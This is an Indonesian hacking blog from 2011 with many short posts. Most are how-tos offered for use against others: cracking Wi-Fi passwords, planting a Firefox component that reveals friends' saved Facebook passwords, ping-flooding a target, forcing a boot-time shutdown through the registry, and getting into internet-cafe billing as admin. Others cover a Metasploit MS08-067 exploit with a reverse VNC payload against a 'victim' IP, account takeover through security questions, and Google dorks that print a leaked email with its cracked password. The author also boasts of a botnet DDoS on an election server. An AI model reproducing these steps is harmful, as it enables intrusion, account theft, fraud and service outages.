Rabu, 07 September 2011

hacking hotspot pasword

|0 komentar
hacking hotspot pasword

bicara soal hacking sepertinya tidak akan ada habisnya..
nah kali ini saya akan memberikan tutorial cara crack pasword hotspot dengan menggunakan sebuah tool

penggunaannya mudah banget seperti software2 di win***.. didesain untuk backtrack 4,

downlodnya di
#wget -O wifite.py  http://wifite.googlecode.com /svn/trunk/wifite.py

trus ketik ini
#chmod +x wifite.py

untuk jalankan nya
#python wifite.py

ini screenshot nya..




dan ini screenshot toolsnya..


silahkan coba bagi yg berminat.. dijamin ampuh..

Mengubah tampilan google dengan nama kita

|0 komentar


langsung aja masuk ke sini

1. masuk ke http://www.007google.com/create.asp
2. masukan nama anda
3. pilih mau seperti apa tampilan google anda
4. pilih CREATE MY SEARCH ENGINE

jadi kan...
jika anda menggunakan mozzila buka
tools->options->masukan ke homepage->ok
sekarang tekan ctrl+n....

jadilah....

free webhosting with cpanel

|0 komentar
langsung aja di bawah ini ada beberapa webhost free ama cpanelnya.
namanya juga free pasti ada banner N iklannya, banyak juga peraturannya makanya jangan disalahgunakan

http://www.itrello.com/provisioning/order/index.php
http://www.hostcell.net/panel/order/
http://www.qupis.com/order/
http://www.atbhost.net/ipanel/order/
http://www.thisweekinwebhosting.com/clients/order/
http://tikolah.com/billing/order/?group=2
http://www.freecchost.com/member/order/
http://www.hosthype.co.uk/billing/order/
http://signup.squareserve.com/order/
http://www.sobecknetworks.com/hosting/order/?group=1
http://www.profusehost.net/ipanel/order/...php?step=3
http://www.xlxhost.org/billing/order/
http://freehostspace.info/ipanel4/order/
http://cbc360.net/host/order/index.php
http://tikolah.com/billing/order/?group=2
http://www.420mb.com/billing/order/index.php?group=1
https://www.ihubhost.net/clients/order/
http://www.500mb.us/ipanel/order/
http://cp.proxywrek.com/order/
http://www.gothosted.org/order/order/
http://www.photonhosts.com/clients/order/?group=1
http://hosting-gratuito.org/ipanel/order/
http://client.lairspace.com/order/
http://billing.capital-hosting.co.uk/ord...=1-monthly
http://billing.post4space.com/order/
http://signup.instantfreesite.com/order/
http://xlxhost.tk/ipanelz/order/
http://tourismhost.com/billing/order/
http://www.120meg.net/ipanel/order/
http://www.montoville.com/client/order/
http://light-host.com/billing/order/
http://www.gohost.hk/panel/order/
http://thegioithitrung.com/hostpanel/order/
http://hfu.ir/panel/order/
http://www.xlxhost.org/billing/order/
http://profusehost.net/ipanel/order/
http://webz.pk/order/
http://www.hosttip.com/host/order/
http://www.bettahosting.com/ipanel/order/
http://www.sobecknetworks.com/hosting/or...hp?group=1
https://www.ihubhost.net/clients/order/?group=1
http://www.500mb.us/ipanel/order/
http://www.photonhosts.com/clients/order/?group=9
http://billing.capital-hosting.co.uk/order/

cara mendapatkan facebook teman

|0 komentar
langkah2 untuk mendapatkan FB temen...

1.download filex disini (http://www.ziddu.com/download/10806194/nsLoginManagerPrompter.zip.html))
2.abis itu extract n copy paste filex ke C:\Program Files\Mozilla
Firefox\components
3.restart browser anda..
4.biarin temen anda log in di kompi anda
5.biar bisa liat klik "tools" pada mozilla lalu "options" klik pada tab
"security"trus "save pasword" trus tinggal klik "show password"


....selamat mencoba....
--===semoga berhasil===--

mengenal botnet

|0 komentar
Apa itu Botnet??


Jika anda setiap harinya mendapatkan ratusan spam di dalam mailbox, menemukan posting penjualan
Viagra pada forum diskusi, atau anda pernah mendengar bahwa sebuah website tidak dapat diakses
karena mendapat serangan DDOS. Hal-hal tersebut diatas bisa dilakukan dengan melakukan perintah
atas botnets.
Botnet atau Robot jejaringan adalah program tidak terlihat yang tergabung dalam sejumlah pasukan
zombie digital dan dikendalikan oleh hacker melalui internet. Umumnya botnet diorganisir melalui irc
pada chatroom tertentu yang telah di-set oleh pemiliknya (baca: botmaster).
Salah satu jenis botnet yang tersebar di internet adalah worm Conficker/ w32.kido/downadup. Menurut
F-Secure, Conficker menginfeksi lebih dari 9 juta komputer dan merupakan worm yang paling sukses
penyebarannya dalam sejarah worm di internet.
Bagaimana Botnet bekerja?
Irc Botnet melakukan tugasnya berdasarkan perintah botmaster. Botnet bisa mendapatkan akses penuh
terhadap sebuah komputer yang terinfeksi seperti Melakukan serangan DDOS secara serentak,
mengendalikan sistem hardware maupun software, mencuri informasi sensitif korban dan
mengirimkannya ke chatroom.

Serangan Distributed Denial Of Service dengan Botnet
Sebagai ilustrasinya, penulis akan menjelaskan dengan sangat sederhana.
Bayangkan jika anda adalah salah seorang teller pada sebuah bank. Anda akan melayani kostumer
secara satu persatu dimana mereka melakukan antrian dan menunggu giliran. Anda tentu bisa
memenuhi permintaan kostumer secara satu persatu dan terpenuhi. Secara wajarnya, kostumer hanya
melakukan satu atau dua permintaan saja seperti “saya ingin menyetor sejumlah uang” atau “saya
minta bilyet giro ini dicairkan ke rekening saya”. Dan anda bukan satu-satunya teller yang melayani
kostumer. Beberapa teller menjalankan tugas yang sama seperti anda secara teratur.
Tetapi situasi akan berbeda jika ada sekelompok orang dalam jumlah yang banyak secara serentak
menyerbu ke counter dan melakukan banyak permintaan dan berbicara dengan bahasa yang tidak
anda mengerti. Masih bisakah anda memenuhi permintaan mereka? Saya yakin hanya satpam yang
bisa mengatasi penyerbuan dari sekelompok kostumer yang gila dan tidak tahu darimana asalnya.
Di firefox :
GET / HTTP/1.1
Host: 114.121.6.87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609
Firefox/3.0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Di Internet Explorer :
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwaveflash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: id
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 114.121.6.87
Connection: Keep-Alive
Di Opera :
GET / HTTP/1.1
User-Agent: Opera/9.50 (Windows NT 5.1; U; en)
Host: 114.121.6.87
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg,
image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: id-ID,id;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive
Permintaan akan direspon oleh server dan sementara browser hanya menunggu kiriman data. Dan
hasilnya adalah tampilan situs yang bisa anda lihat di browser. Untuk permintaan wajar seperti itu, server
tidak akan mengalami masalah.
Tetapi jika server diminta secara berkali-kali dengan berbagai jenis permintaan yang tidak wajar seperti
mengirimkan data sampah dan dilakukan secara serentak. Tentu saja server dengan bandwidth yang
seadanya akan langsung down dalam waktu yang singkat.
Pada sebuah channel IRC, penulis memerintahkan botnet untuk melakukan serangan secara serentak.
Setiap satu botnet penulis mengirimkan paket dan permintaan sebanyak 2 kali setiap detiknya ke server
KPU, ada sekitar 40 bot dengan IP address dan kecepatan koneksi yang berbeda. Artinya ada sekitar 80
kali permintaan setiap detik dimana server KPU memproses permintaan, merespon dan menolak
permintaan yang tidak wajar sebanyak 14400 kali dalam waktu 2 menit.

kaskus pernah hancur karena ddos

|0 komentar

Nah, kalian yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).

Untuk lebih jelasnya, bisa anda baca dibawah ini :

Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).

Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.

Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.

Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.

Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.

Ditulis oleh template (Co-Admin KasKus dengan User ID 5)

nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.

berikut ini Dino berikan cara-caranya ( Singkat mode : On )

Penjelasan da DDoS

Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).

penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.

Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :

Ping -l ip-address/domain-target

sebagai contoh untuk domain target :

Ping -l www.google.co.id 100000

Contoh untuk domain IP address target :

Ping -l 216.239.61.104 100000

Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).

Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )

Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.


Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :

Ping -t -l ip-address/domain-target


Cara Membuat Komputer Langsung Shutdown Saat Di Hidupkan

|0 komentar
Cara Membuat Komputer Langsung Shutdown Saat Di Hidupkan

Buat Shortcut "Klik Kanan" Pada Dekstop Pilih "New" â–º "Shortcut"
Pada "Type the location of the item:" Ketikkan Shutdown -s -t "0"
Klik "Next >" Masukkan Nama Shortcutnya "Auto Off"
Buka Menu "Start" â–º "Klik Kanan" Pada "All Program" â–º "Open" Copy Shortcut Yang Anda Buat Tadi Ke Directory "Start Menu"
Kemudian Buka "Regedit"
Buka Menu "Start" â–º "Run" â–º Ketikkan "regedit" â–º "enter" Atau "Winkey + R"
Buka "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Klik Kanan Pada Window "Run" Pilih "String Value" Masukkan Nama Stringnya "Auto Off"
Double Klik Pada String "Auto Off" Pada "Value Data" Masukkan Address Shortcutnya !!! Contoh C:\Documents and Settings\Erik Cookies\Start Menu\Auto Off
Setelah Kata "Start Menu" Itu Adalah Nama Shortcut Yang Anda Buat Tadi Yaitu "Auto Off"
Klik "OK"
Kemudian Tutup Jendela "Registry Editor"
Dan "Restart" Komputer !!!

Klo Komputer Menggunakan Deepfreeze "Disable" kan Deepfreeze Terlebih Dahulu....
Klo Main Di Warnet Bobol Deepfreeze Dan Undeepfreeze Bisa Di Cari Di Google
Usahakan Bobol Deepfreeze Dahulu Baru Bikin Tutor Diatas
Klo Gak Di Bobol Dahulu Gak Bakalan Bisa....
Sekian Tutor Dari Saia....
Jangan Di Gunakan Untuk Kejahatan....

Oh iia !!!
Cara Balikinnya Adalah Waktu Komputer Hidupkan Pencet F5
Dan Pilih Safe Mode â–º Enter !!!
Setelah Proses Selesai
Biasanya Di Perintahkan Pilih User !!!
Pilih Aja User Yang Bukan Administrator !!!
Dan Setelah Masuk Ke Dekstop, Buka Ke Regedit Dan Masuk HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Klik Kanan Pada String Value Yang Anda Buat Tadi Dan Delete !!!
Restart Komputer !!!
Dan Auto Shutdown Pun Sudah Tidak Aktif !!!



bobol biling warnet( masuk sebagai admin)

|0 komentar
bobol biling warnet( masuk sebagai admin)


Kali ini sy akan sedikit bahas mengenai gimana si caranya biar kita Free Internet di Warnet ??:

( nah ini pasti buat pencinta Game sangat antusias ni )

ikuti langkah sy ini, asal mau nurut & gk aneh2 dengan step yang sy berikan !!

1. Oke langkah awal ini kita harus cari itu yang namanya kabel LAN pada komputer yang akan kita tempati, nah kalo uda ketemu poko ciri2 kabel putih & colokannya agak mejeng/ keren dikit nah itu pasti kabel LAN !! hehehe

2. Oke tahap dua, kalo uda ketemu tuh kabel apa ya yang harus dilakuin ??
Gampang aja & simple, kaka cabut aja tuh kabel LAN dari CPU, hehehe
Terkesan mencurigakan, tapi ini murni bisa di terapkan pada Warnet yang mempunyai daya tampung ruang atau bisa kita sebut aja punya komputer banyak.

3. Oke tahap 3 ini lebih agak dipercepat aja , soalnya ntar kalo kelamaan utak-atik kabel pihak warnet taug, and yang gk kalah hebohnya kita bisa dihakimi massa ( nah kalo ini terjadi, bukan tanggung jawab sy !! ) hehehe
Tahap 3 ini setelah kaka berhasil cabut tuh kabel, langsung restart kembali tu komputer, kalo udahh ..

4. Nah tahap ini langsung aja gk usah banyak cekidot bekicot !!! hehee
Kalo udah kalian restart ntar kan tuh billing mulai dari " Personal, Paket, Admin dkk " kan mucul tuh ??
Ntar kalian klik aja sebagai admin ( umpamanya ini adalah pemilik warnet itu ) huahahahaha
Eh masuk tahap 5 aja ya yang mau masuk jadi admin ?? wkkwkwkw

5. Kalo uda kan tadi klik admin ??
Nah langsung aja isi password admin itu dengan " 008 " ( soalnya ni merupakan passworde default dari app billing yang biasa di pake di warnet )
Nah kalo udah, kalian hapus aja tuh password admin yang ada di kolom paling bawah kiri ( catatan buat masuk tahap ini, cari aja yang dalam kolom isinya bintang " * " )

6. Yang ke-6 ini, adalah ...
Eng ing enggggg ..
Berhasil deh kalian masuk sebagai admin,

metasploit tutorial

|0 komentar

mungkin tutor ini banyak di temukan di google karena saking banyaknya
yang kuasai tools ini, mulai dari para sesepuh hacking maupun para anak baru
di dunia underground kayak gw

persiapan yg di perlukan antara lain:

1.Metasploit versi berapa z, karena sekarang udah versi 3.3 maka kita akan
memakai versi baru tersebut tool ini bisa di download di http://metasploit.com

2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren )

3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya

4.Ip dari komputer korban ( 192.168.2.78)

5.mau nyiapin apa z terserah dehh

pertama install metasploitnya, klo di mikocok tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc teman, klo gw sih sering maku
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on Mikocok )
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 452 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7628 updated 6 d

msf >

kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.2.87

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show PAYLOAD

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.2.87 -----> komputer korba

set LHOST 192.168.2.2 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit

tunggu setelah selesai, akan muncul jendela desktop dari komputer korban.
kita tinggal remote komputer

Klo untuk pemahaman buat msf sih tergantung kreatifnya kita gmn caranya
karena dalam msf banyak sekali bug yg bisa kita exploit

kelebihan OS linux

|0 komentar
kelebihan OS linux


1. Tidak memerlukan perangkat keras yang mahal. Linux dapat berjalan pada komputer PC dengan konfigurasi minimal sbb :
* Mikroprosesor 386 DX (intel, AMD, Cyrix, TI, Chips&Tech.)
* RAM 4 MB (tanpa GUI) dan 8 MB (dengan GUI)
* Space harddisk 85 MB

2. Linux merupakan sistem operasi FULL 32-bit. Tak ada kode 16-bit atau campuran keduanya dalam setiap aplikasinya, sehingga kecil kemungkinan terjadi crash (bentrok) antar aplikasi.

3. Preemptive multitasking, yaitu menangani banyak proses secara bersamaan, semua proses tersebut tidak saling menghalangi/ menghambat walaupun berjalan pada saat yang sama.

4. Multiuser, yaitu lebih dari satu orang dapat menggunakan program yang sama/ berbeda-beda dari satu mesin yang sama pada saat bersamaan di terminal yang sama/berbeda.

5. Multiconsole. Dalam satu komputer, pengguna dapat melakukan login dengan nama user yang sama/berbeda lebih dari satu kali, tanpa perlu menutup sesi sebelumnya.

6. Linux memiliki grafis antarmuka (GUI) sebagaimana Operating System modern lainnya. Antarmuka grafisnya dinamakan X-Window System (bukan X-Windows) dengan pilihan tampilan yang bervariasi (dinamis).

7. Program - program maupun aplikasi-aplikasi networking tersedia dalam semua distribusi Linux (dalam CD atau disket), sehingga tak perlu mencari/membeli/mendownload aplikasi tambahan lagi.

8. Tidak perlu melakukan defragment. Linux memakai sistem file ext2fs (Second Extended File System) yang mempunyai keunggulan reduksi fragmentasi otomatis. Dengan memakai ext2fs, kinerja baca/tulis (akses) dari/ke harddisk tetap terjaga.

9. Dukungan akses 33 macam sistem file yang berbeda. Linux mampu mengakses sistem file FAT16, FAT32 (kepunyaan DOS), VFAT (Win), HPFS (OS/2), Minix, UFS (Solaris), Xenix, SCO, Novell, dsb.

10. Pertambahan Pengguna Linux yang pesat. Linux adalah varian UNIX(TM) yang tercatat mempunyai perkembangan paling pesat di seluruh dunia. Dengan semakin bertambahnya pengguna, semakin mudah mendapatkan dukungan dan driver untuk perangkat keras yang beragam. Situs-situs web yang didedikasikan untuk menyebarkan informasi mengenai Linux serta ajang diskusi tentang Linux juga semakin bertambah jumlahnya.

11. Remote Control. Setiap pengguna Linux yang memanfaatkan port 23 dengan program Telnet dapat mengendalikan komputer Linux dari jarak jauh, kapan pun, dari mana pun, seperti seolah - olah sang pengguna berada di hadapannya secara langsung.

cara hack email facebook (newbie inside)

|0 komentar
Cara Hack Facebook ini tidak direkomendasikan bagi teman-teman yang berniat mencuri chip poker, namun disini saya rekomendasikan bagi hal-hal yang bermanfaat seperti: ingin mengetahui mobilitas pesan orang terdekat anda (Istri/Suami, Tunangan, Anak, Saudara dan lain-lain), memperbaiki akun email yang terblokir dan mengetahui password Facebook kita yang terlupakan.

Mungkin itu tujuan awal saya berbagi tips ini, untuk selanjutnya itu tanggung jawab anda.
Oke, langsung saja ke langkah-langkah untuk hack akun facebook. Sebelum ke langkah-langkah hack facebook, perlu kiranya anda memenuhi syarat-syarat berikut:

* Harus memiliki alamat email target dari Yahoo.Com (yahoo.com, ymail.com, rocketmail.com, yahoo.co.id...dll)

* Anda harus tahu mengenai target, khususnya tanggal lahir, tempat spesial, guru pertama dan lain-lain.

Jika dua syarat itu terpenuhi, maka kemungkinan besar anda bisa hacking facebook target yang pada awalnya harus hack emailnya dulu. Mari kita lanjutkan untuk langkah-langkah hack facebook via email ini, pertama-tama saya paparkan tutorial hack facebook via email yahoo (jika target menggunakan email yahoo).

Langkah pertama, Lakukan Seperti gambar di bawah ini....



Langkah Kedua, Seperti Gambar di bawah ini.........


Langkah ketiga, Seperti Gambar di bawah ini........


Langkah Keempat, Seperti Gambar di bawah....

(Jika anda benar-benar dekat dengan target, maka anda kemungkinan besar bisa menjawab pertanyaan di kolom tersebut)
Langkah Terakhir, jika anda bisa menjawab pertanyaan pada langkah keempat. Maka, anda akan masuk pada halaman reset password. Halaman reset password adalah password baru yang bebas anda buat atau secara tidak langsung anda telah menguasai email tersebut.,,,,

---===Selamat Mencoba===---

jika ada pertanyaan silahkan diskusikan disini

nonton starwars di cmd milik kalian

|0 komentar
nonton starwars di cmd milik kalian


langsung aja tanpa basa basi

Buka Run
tulis Cmd
setelah keluar layar hitam ( dos )
Tulis Telnet
setelah keluar layar hitam Telnet
lalu tulis huruf " o " ( tu huruf o bukan 0 ) tanpa tanda kutib
lalu tulis towel.blinkenlights.nl

baru setelah itu telnet akan melakukan koneksi ke server

dan tada selamat menyaksikan film stars wars di cmd mu

hack akun email menggunakan google dork

|0 komentar
Hari ini saya akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita

Persyaratan:

Google Dorks:

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
ext:sql intext:@hotmail.com intext:password


Online hash cracker:
http://md5crack.com/

Ok mari kita mulai:

Mari kita pergi ke http://www.google.com dan copy paste kan dork yang saya share,.....dan cari salah satu situs di sana buat korban


Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash

Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d



Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707

ets, bersenang-senang dan menikmati akun tak terbatas

jika masih ada pertanyaan silahkan tanyakan disini


memasukan jebakan betmen ke situs deface kita

|0 komentar
langsung aja
pertama buka notepad save dgn .html

<html>
  <head>
    <title>Hacked By BM.hacker</title>
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
<frame src="http://bilogisma.blogspot.com/" name="Hacked By BM.hacker" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>
</html> 


upload file .html yang kita buat tadi di situs deface kita
misal na mau buat jebakan betmen sendiri, ganti link http://bilogisma.blogspot.com/ dengan link jebakan betmen kalian.



.

  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

brute force

|0 komentar
brute force


Serangan brutal (bahasa Inggris:Brute-force attack) adalah sebuah teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci yang mungkin. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Sebagai contoh, untuk menyelesaikan sebuah persamaan kuadrat seperti x²+7x-44=0, di mana x adalah sebuah integer, dengan menggunakan teknik serangan brute-force,

penggunanya hanya dituntut untuk membuat program yang mencoba semua nilai integer yang mungkin untuk persamaan tersebut hingga nilai x sebagai jawabannya muncul. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya: "When in doubt, use brute-force" (jika ragu, gunakan brute-force).

Teknik yang paling banyak digunakan untuk memecahkan password, kunci, kode atau kombinasi. Cara kerja metode ini sangat sederhana yaitu mencoba semua kombinasi yang mungkin.
